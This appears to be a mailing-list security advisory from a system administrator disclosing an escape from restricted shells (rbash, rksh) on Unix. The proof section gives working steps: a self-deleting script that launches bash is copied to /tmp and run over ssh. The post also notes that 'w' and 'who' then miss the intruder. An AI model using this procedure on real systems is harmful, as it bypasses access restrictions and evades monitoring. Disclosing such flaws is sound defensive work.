Restricted Shells

[A.Dimitrov <adimitro () bobcat gcsu edu>]

I have recently realized a security issue in some
of the restricted shells on *NIX systems. I am not
sure if I am the first one to discover the problem
I am going to discuss but I am sure that it has
not been posted yet, atleast not that I know of.

Basically this is the issue:

Affected Systems:
=================
Any Unix systems that I am aware of using
restricted shells (rbash, rksh)

Description:
============
An authorized user is that is set to use rbash or
rksh is able to escape the restricted shell
environment and then furthermore exploit the
system. The problem comes from the fact thatwhen a
command is executed from the shell and it is found
to be a shell procedure then rksh or rbash are
invoked to  execute it.

Proof:
======

One needs to store the shell script in a
world-writable directory like /tmp or /usr/tmp
so let's assume the server is running sshd (This
is also exploitable through rsh). In this case
store in a file called anything you want (I will
use .tmp123) the following:

---

/usr/bin/bash 
rm -Rf /tmp/.tmp123

---


Then execute the following:

$scp ./.tmp123 user@host:/tmp

user@host's password:

Done.

$ssh -l user host '/tmp/.tmp123'
user@host's password:
_


You should now have a normal bash shell instead 
of the original rbash.
Also a great plus to doing this is that whenever
you follow the procedure above the commands 'w'
and 'who' cannot detect your presence. However
'ps' dows show the intruder's presence.

Fix:
====
I am not aware of any except maybe an attempt to
retune the system. If anyone has any ideas please
e-mail me.

A. Dimitrov
System Administrator
Georgia College & State University